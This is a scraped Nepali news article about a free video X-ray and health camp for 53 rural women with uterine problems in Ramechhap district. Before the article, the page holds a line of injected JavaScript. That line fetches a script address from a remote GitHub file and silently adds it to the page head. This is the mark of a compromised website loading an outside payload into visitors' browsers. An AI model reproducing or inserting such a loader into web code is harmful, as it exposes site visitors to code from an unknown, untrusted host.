;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
माघ २६,
रामेछाप । रामेछाप जिल्लाको खाँडादेवी गाउँपालिका वडा नं ५ पकरबासका ५३ जना महिलाहरुको निः शुल्क भिडियो एक्स रे तथा स्वास्थ्य परिक्षण गरिएको छ ।
अस्पताल तथा स्वास्थ्य सेवामा कम पहुँच भएका पाठेघर सम्बन्धि समस्याबाट पिडित ग्रामिण महिलाहरुलाई लक्षित गरि संचालन गरिएको उक्त स्वास्थ्य शिविरमा पाठेघरमा समस्या भएका ५३ महिलाको निः शुल्क भिडियो एक्स-रे गरिएको हो । शिविरमा स्वास्थ्य परिक्षणका लागि आएका महिला मध्ये केहि महिलालाई पथ्थरी भएको पाइएको स्वास्थ्य परिक्षण गर्न गाउँमा पुग्नु भएका डा. सुमन कर्माचार्यले बताए ।
तामाकोसी अस्पतालको प्राविधिक सहयोग तथा स्थानीय त्रिशक्ति महिला समाजको आयोजनामा सम्पन्न उक्त शिविरमा खाँडादेवी गाउँपालिकाको वडा नं ४ र ५ का महिलाहरुले सेवा लिएको संस्थाकी सचिव शैलजा ढुंगेलले बताइन् । उक्त संस्थाले यस अगाडि पनि गाउँमा महिला सशक्तिकरणका लागि आयआर्जन तथा सचेतना मुलक कार्यक्रमहरु संचालन गर्दै आएको छ ।
हिलाहरुका समस्यामा केन्द्रीत यो संस्थाले आगमी दिनहरुमा पनि स्वास्थ्य शिविर, आय आर्जन तथा महिलाको शशक्तिकरणका लागि विभिन्न कार्यक्रमहरु संचालन गर्ने योजना रहेको संस्थाले जनाएको छ ।
फेसबुक प्रतिक्रियाहरु